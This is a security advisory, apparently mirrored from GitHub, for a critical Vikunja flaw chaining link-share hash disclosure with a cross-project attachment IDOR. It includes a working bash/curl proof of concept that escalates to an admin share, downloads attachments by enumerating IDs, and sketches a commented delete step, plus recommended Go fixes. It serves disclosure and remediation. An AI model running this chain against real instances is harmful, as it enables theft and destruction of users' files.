GHSA-2PV8-4C52-MF8J
Vulnerability from github – Published: 2026-03-26 16:56 – Updated: 2026-03-26 16:56Summary
Two independently-exploitable authorization flaws in Vikunja can be chained to allow an unauthenticated attacker to download and delete every file attachment across all projects in a Vikunja instance. The ReadAll endpoint for link shares exposes share hashes (including admin-level shares) to any user with read access, enabling permission escalation. The task attachment ReadOne/GetTaskAttachment endpoint performs permission checks against a user-supplied task ID but fetches the attachment by its own sequential ID without verifying the attachment belongs to that task, enabling cross-project file access.
Details
Vulnerability 1: Link Share Hash Disclosure (Permission Escalation Entry Point)
Tracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9
The LinkSharing.ReadAll() method in pkg/models/link_sharing.go:228-287 returns all link shares for a project, including the Hash field:
// pkg/models/link_sharing.go:46-50
type LinkSharing struct {
ID int64 `xorm:"bigint autoincr not null unique pk" json:"id" param:"share"`
Hash string `xorm:"varchar(40) not null unique" json:"hash" param:"hash"` // ← exposed in JSON
// ...
}
The ReadAll clears passwords but not hashes:
// pkg/models/link_sharing.go:272-277
for _, s := range shares {
if sharedBy, has := users[s.SharedByID]; has {
s.SharedBy = sharedBy
}
s.Password = "" // ← password cleared, but hash remains
}
A link share user with read-only access can call GET /api/v1/projects/:project/shares (routed at pkg/routes/routes.go:483) to discover all shares, then authenticate with an admin-level share hash.
Vulnerability 2: Cross-Project Attachment IDOR (Data Exfiltration)
Tracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2
The GetTaskAttachment handler in pkg/routes/api/v1/task_attachment.go:156-186 performs the permission check against the task ID supplied in the URL:
// pkg/models/task_attachment_permissions.go:25-28
func (ta *TaskAttachment) CanRead(s *xorm.Session, a web.Auth) (bool, int, error) {
t := &Task{ID: ta.TaskID} // ← ta.TaskID from URL parameter
return t.CanRead(s, a) // ← checks if user can read THIS task
}
But ReadOne fetches the attachment by its own ID, ignoring the task:
// pkg/models/task_attachment.go:110-111
func (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {
exists, err := s.Where("id = ?", ta.ID).Get(ta) // ← fetches by attachment ID only
// ta.TaskID is now overwritten with the ACTUAL task ID from the database
// But the permission check already passed using the attacker-controlled task ID
This means: specify a task you CAN access, but an attachment ID from a different project → permission check passes, wrong attachment is returned.
The Chain
Link share URL (public)
→ POST /shares/{hash}/auth (get JWT)
→ GET /projects/{id}/shares (discover admin share hash)
→ POST /shares/{admin_hash}/auth (escalate to admin)
→ GET /projects/{id}/tasks (find any accessible task ID)
→ GET /tasks/{accessible_task}/attachments/{1..N} (enumerate ALL attachments)
→ DELETE /tasks/{accessible_task}/attachments/{1..N} (destroy ALL attachments)
PoC
Prerequisites: A Vikunja instance with at least one link share (any permission level). The attacker only needs the link share URL.
VIKUNJA="http://localhost:3456/api/v1"
# Step 1: Authenticate with a known read-only link share hash
# (Link share URLs look like: https://instance/share/HASH_HERE)
SHARE_HASH="read-only-share-hash"
TOKEN=$(curl -s -X POST "$VIKUNJA/shares/$SHARE_HASH/auth" \
-H "Content-Type: application/json" \
-d '{}' | jq -r '.token')
echo "Got JWT: $TOKEN"
# Step 2: Discover all link shares for the project (including admin shares)
PROJECT_ID=1 # from the link share JWT claims
SHARES=$(curl -s "$VIKUNJA/projects/$PROJECT_ID/shares" \
-H "Authorization: Bearer $TOKEN")
echo "All shares exposed:"
echo "$SHARES" | jq '.[].hash' # All hashes visible, including admin shares
# Step 3: Escalate to admin if available
ADMIN_HASH=$(echo "$SHARES" | jq -r '.[] | select(.permission == 2) | .hash' | head -1)
if [ -n "$ADMIN_HASH" ]; then
TOKEN=$(curl -s -X POST "$VIKUNJA/shares/$ADMIN_HASH/auth" \
-H "Content-Type: application/json" \
-d '{}' | jq -r '.token')
echo "Escalated to admin share: $ADMIN_HASH"
fi
# Step 4: Get a task ID we can legitimately access
TASK_ID=$(curl -s "$VIKUNJA/projects/$PROJECT_ID/tasks" \
-H "Authorization: Bearer $TOKEN" | jq '.[0].id')
echo "Using accessible task: $TASK_ID"
# Step 5: Exploit attachment IDOR - enumerate ALL attachments across ALL projects
for ATTACHMENT_ID in $(seq 1 100); do
RESP=$(curl -s -o /tmp/attachment_$ATTACHMENT_ID -w "%{http_code}" \
"$VIKUNJA/tasks/$TASK_ID/attachments/$ATTACHMENT_ID" \
-H "Authorization: Bearer $TOKEN")
if [ "$RESP" = "200" ]; then
echo "Downloaded attachment $ATTACHMENT_ID (from ANY project): /tmp/attachment_$ATTACHMENT_ID"
fi
done
# Step 6 (destructive, with admin share): Delete attachments from other projects
# curl -s -X DELETE "$VIKUNJA/tasks/$TASK_ID/attachments/$TARGET_ATTACHMENT_ID" \
# -H "Authorization: Bearer $TOKEN"
Impact
Confidentiality (HIGH): An attacker with a single publicly-shared link share URL can download every file attachment across all projects in the Vikunja instance. Attachment IDs are sequential integers, making enumeration trivial. This includes confidential documents, images, and any files uploaded by any user in any project.
Integrity (HIGH): With the permission escalation from read-only to admin (via hash disclosure), the attacker can delete attachments from any project, causing data loss across the entire instance.
Attack prerequisites are minimal: Link shares are designed to be publicly shared — they're the mechanism for sharing projects with external collaborators. A single leaked or intentionally-shared link share URL (even read-only) is sufficient to compromise all file attachments instance-wide.
Blast radius: Every project, every task, every file attachment on the instance is exposed regardless of project membership, team boundaries, or access controls.
Recommended Fix
Fix 1 — Link Share Hash Disclosure: Clear the hash field in ReadAll responses:
// pkg/models/link_sharing.go — in ReadAll loop (~line 272)
for _, s := range shares {
if sharedBy, has := users[s.SharedByID]; has {
s.SharedBy = sharedBy
}
s.Password = ""
s.Hash = "" // ← ADD THIS: never expose hashes to other share holders
}
Fix 2 — Attachment IDOR: Verify the attachment belongs to the specified task in both ReadOne and the download handler:
// pkg/models/task_attachment.go — ReadOne
func (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {
exists, err := s.Where("id = ? AND task_id = ?", ta.ID, ta.TaskID).Get(ta)
// ^^^^^^^^^^^^^^ ADD: verify task ownership
if err != nil {
return
}
// ...
}
Both fixes should be applied — the attachment IDOR is exploitable independently by any authenticated user, and the link share hash disclosure enables permission escalation even without the attachment bug.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.0"
},
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T16:56:24Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\nTwo independently-exploitable authorization flaws in Vikunja can be chained to allow an unauthenticated attacker to download and delete every file attachment across all projects in a Vikunja instance. The `ReadAll` endpoint for link shares exposes share hashes (including admin-level shares) to any user with read access, enabling permission escalation. The task attachment `ReadOne`/`GetTaskAttachment` endpoint performs permission checks against a user-supplied task ID but fetches the attachment by its own sequential ID without verifying the attachment belongs to that task, enabling cross-project file access.\n\n## Details\n\n### Vulnerability 1: Link Share Hash Disclosure (Permission Escalation Entry Point)\n\nTracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9\n\nThe `LinkSharing.ReadAll()` method in `pkg/models/link_sharing.go:228-287` returns all link shares for a project, including the `Hash` field:\n\n```go\n// pkg/models/link_sharing.go:46-50\ntype LinkSharing struct {\n ID int64 `xorm:\"bigint autoincr not null unique pk\" json:\"id\" param:\"share\"`\n Hash string `xorm:\"varchar(40) not null unique\" json:\"hash\" param:\"hash\"` // \u2190 exposed in JSON\n // ...\n}\n```\n\nThe ReadAll clears passwords but not hashes:\n```go\n// pkg/models/link_sharing.go:272-277\nfor _, s := range shares {\n if sharedBy, has := users[s.SharedByID]; has {\n s.SharedBy = sharedBy\n }\n s.Password = \"\" // \u2190 password cleared, but hash remains\n}\n```\n\nA link share user with read-only access can call `GET /api/v1/projects/:project/shares` (routed at `pkg/routes/routes.go:483`) to discover all shares, then authenticate with an admin-level share hash.\n\n### Vulnerability 2: Cross-Project Attachment IDOR (Data Exfiltration)\n\nTracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2\n\nThe `GetTaskAttachment` handler in `pkg/routes/api/v1/task_attachment.go:156-186` performs the permission check against the task ID supplied in the URL:\n\n```go\n// pkg/models/task_attachment_permissions.go:25-28\nfunc (ta *TaskAttachment) CanRead(s *xorm.Session, a web.Auth) (bool, int, error) {\n t := \u0026Task{ID: ta.TaskID} // \u2190 ta.TaskID from URL parameter\n return t.CanRead(s, a) // \u2190 checks if user can read THIS task\n}\n```\n\nBut `ReadOne` fetches the attachment by its own ID, ignoring the task:\n\n```go\n// pkg/models/task_attachment.go:110-111\nfunc (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {\n exists, err := s.Where(\"id = ?\", ta.ID).Get(ta) // \u2190 fetches by attachment ID only\n // ta.TaskID is now overwritten with the ACTUAL task ID from the database\n // But the permission check already passed using the attacker-controlled task ID\n```\n\nThis means: specify a task you CAN access, but an attachment ID from a different project \u2192 permission check passes, wrong attachment is returned.\n\n### The Chain\n\n```\nLink share URL (public)\n \u2192 POST /shares/{hash}/auth (get JWT)\n \u2192 GET /projects/{id}/shares (discover admin share hash)\n \u2192 POST /shares/{admin_hash}/auth (escalate to admin)\n \u2192 GET /projects/{id}/tasks (find any accessible task ID)\n \u2192 GET /tasks/{accessible_task}/attachments/{1..N} (enumerate ALL attachments)\n \u2192 DELETE /tasks/{accessible_task}/attachments/{1..N} (destroy ALL attachments)\n```\n\n## PoC\n\n**Prerequisites:** A Vikunja instance with at least one link share (any permission level). The attacker only needs the link share URL.\n\n```bash\nVIKUNJA=\"http://localhost:3456/api/v1\"\n\n# Step 1: Authenticate with a known read-only link share hash\n# (Link share URLs look like: https://instance/share/HASH_HERE)\nSHARE_HASH=\"read-only-share-hash\"\n\nTOKEN=$(curl -s -X POST \"$VIKUNJA/shares/$SHARE_HASH/auth\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{}\u0027 | jq -r \u0027.token\u0027)\n\necho \"Got JWT: $TOKEN\"\n\n# Step 2: Discover all link shares for the project (including admin shares)\nPROJECT_ID=1 # from the link share JWT claims\n\nSHARES=$(curl -s \"$VIKUNJA/projects/$PROJECT_ID/shares\" \\\n -H \"Authorization: Bearer $TOKEN\")\n\necho \"All shares exposed:\"\necho \"$SHARES\" | jq \u0027.[].hash\u0027 # All hashes visible, including admin shares\n\n# Step 3: Escalate to admin if available\nADMIN_HASH=$(echo \"$SHARES\" | jq -r \u0027.[] | select(.permission == 2) | .hash\u0027 | head -1)\n\nif [ -n \"$ADMIN_HASH\" ]; then\n TOKEN=$(curl -s -X POST \"$VIKUNJA/shares/$ADMIN_HASH/auth\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{}\u0027 | jq -r \u0027.token\u0027)\n echo \"Escalated to admin share: $ADMIN_HASH\"\nfi\n\n# Step 4: Get a task ID we can legitimately access\nTASK_ID=$(curl -s \"$VIKUNJA/projects/$PROJECT_ID/tasks\" \\\n -H \"Authorization: Bearer $TOKEN\" | jq \u0027.[0].id\u0027)\n\necho \"Using accessible task: $TASK_ID\"\n\n# Step 5: Exploit attachment IDOR - enumerate ALL attachments across ALL projects\nfor ATTACHMENT_ID in $(seq 1 100); do\n RESP=$(curl -s -o /tmp/attachment_$ATTACHMENT_ID -w \"%{http_code}\" \\\n \"$VIKUNJA/tasks/$TASK_ID/attachments/$ATTACHMENT_ID\" \\\n -H \"Authorization: Bearer $TOKEN\")\n\n if [ \"$RESP\" = \"200\" ]; then\n echo \"Downloaded attachment $ATTACHMENT_ID (from ANY project): /tmp/attachment_$ATTACHMENT_ID\"\n fi\ndone\n\n# Step 6 (destructive, with admin share): Delete attachments from other projects\n# curl -s -X DELETE \"$VIKUNJA/tasks/$TASK_ID/attachments/$TARGET_ATTACHMENT_ID\" \\\n# -H \"Authorization: Bearer $TOKEN\"\n```\n\n## Impact\n\n**Confidentiality (HIGH):** An attacker with a single publicly-shared link share URL can download every file attachment across all projects in the Vikunja instance. Attachment IDs are sequential integers, making enumeration trivial. This includes confidential documents, images, and any files uploaded by any user in any project.\n\n**Integrity (HIGH):** With the permission escalation from read-only to admin (via hash disclosure), the attacker can delete attachments from any project, causing data loss across the entire instance.\n\n**Attack prerequisites are minimal:** Link shares are designed to be publicly shared \u2014 they\u0027re the mechanism for sharing projects with external collaborators. A single leaked or intentionally-shared link share URL (even read-only) is sufficient to compromise all file attachments instance-wide.\n\n**Blast radius:** Every project, every task, every file attachment on the instance is exposed regardless of project membership, team boundaries, or access controls.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Link Share Hash Disclosure:** Clear the hash field in ReadAll responses:\n\n```go\n// pkg/models/link_sharing.go \u2014 in ReadAll loop (~line 272)\nfor _, s := range shares {\n if sharedBy, has := users[s.SharedByID]; has {\n s.SharedBy = sharedBy\n }\n s.Password = \"\"\n s.Hash = \"\" // \u2190 ADD THIS: never expose hashes to other share holders\n}\n```\n\n**Fix 2 \u2014 Attachment IDOR:** Verify the attachment belongs to the specified task in both ReadOne and the download handler:\n\n```go\n// pkg/models/task_attachment.go \u2014 ReadOne\nfunc (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {\n exists, err := s.Where(\"id = ? AND task_id = ?\", ta.ID, ta.TaskID).Get(ta)\n // ^^^^^^^^^^^^^^ ADD: verify task ownership\n if err != nil {\n return\n }\n // ...\n}\n```\n\nBoth fixes should be applied \u2014 the attachment IDOR is exploitable independently by any authenticated user, and the link share hash disclosure enables permission escalation even without the attachment bug.",
"id": "GHSA-2pv8-4c52-mf8j",
"modified": "2026-03-26T16:56:24Z",
"published": "2026-03-26T16:56:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2pv8-4c52-mf8j"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Vikunja: Unauthenticated Instance-Wide Data Breach via Link Share Hash Disclosure Chained with Cross-Project Attachment IDOR"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.